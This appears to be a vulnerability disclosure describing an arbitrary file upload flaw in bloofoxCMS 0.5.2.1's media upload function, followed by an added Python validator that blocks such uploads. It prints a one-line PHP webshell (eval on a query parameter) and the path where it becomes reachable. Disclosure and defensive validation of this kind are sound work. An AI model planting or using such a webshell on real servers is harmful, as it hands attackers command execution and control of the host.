I want to report an arbitrary file upload vulnerability that I found in bloofoxCMS 0.5.2.1, through which we can upload a webshell and take control of the web server.
After logging into the web management backend, we can use the upload function to upload files:
We create a new webshell file and name it script.php:

```php
<?php
// Webshell from the report: evaluates whatever PHP is passed in the "1" query parameter
@eval($_GET[1]);
echo 'upload success';
?>
```
Click to select this file (script.php):
Click "Upload file(s)" and capture the request:
First request:
First response:
Then we follow the 302 redirect.
Second request:
Second response:
We can see that the file has been successfully uploaded to /bloofoxcms/media/images/script.php.

Finally, we can access the webshell URL and execute arbitrary commands:

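As an added example, not part of the original report and not bloofoxCMS's own code: the kind of allowlist check that a media upload handler needs before writing a file under a web-served directory such as media/images/. The function name validate_image_upload, the allowed extensions, and the sample inputs are my own assumptions; the point is that script.php (and a double-extension name like shell.php.jpg, or a GIF with a PHP tag inside) would be rejected before it ever reaches the disk.

```python
import re
import secrets
from typing import Tuple

# Constructed example (not bloofoxCMS code): an allowlist of image extensions
# and the magic bytes each one must start with.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Coarse check for a PHP open tag anywhere in the body (catches image/PHP polyglots)
PHP_TAG = re.compile(rb"<\?(php|=)?", re.IGNORECASE)


def validate_image_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). Accept only files that look like plain images."""
    # Keep only the last path component, so "../../x.png" cannot escape the media dir
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not base or base.startswith("."):
        return False, "empty or hidden filename"

    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"

    # Every extension after the first dot must be allowed, so "script.php"
    # and "shell.php.jpg" both fail here regardless of how the server maps handlers.
    exts = parts[1:]
    for ext in exts:
        if ext not in ALLOWED_EXTENSIONS:
            return False, f"disallowed extension: {ext}"

    # The bytes must match the type the extension claims
    if not any(content.startswith(m) for m in MAGIC[exts[-1]]):
        return False, "content does not match declared image type"

    # Reject polyglots such as "GIF89a<?php ...", which a lax check would accept
    if PHP_TAG.search(content):
        return False, "embedded PHP tag"

    return True, "ok"


def storage_name(filename: str) -> str:
    """Server-chosen name for an accepted upload: random stem, allowlisted extension only."""
    ext = filename.lower().rsplit(".", 1)[-1]
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("call validate_image_upload first")
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample: the webshell body from the report
    webshell = b"<?php @eval($_GET[1]);\necho 'upload success';\n?>"
    print("script.php ->", validate_image_upload("script.php", webshell))
    print("logo.png   ->", validate_image_upload("logo.png", b"\x89PNG\r\n\x1a\n\x00\x00"))
```

Even with this check in place, the media directory should also be served with script execution disabled (for example, a PHP handler that is not mapped for that path), since validation and execution policy fail independently.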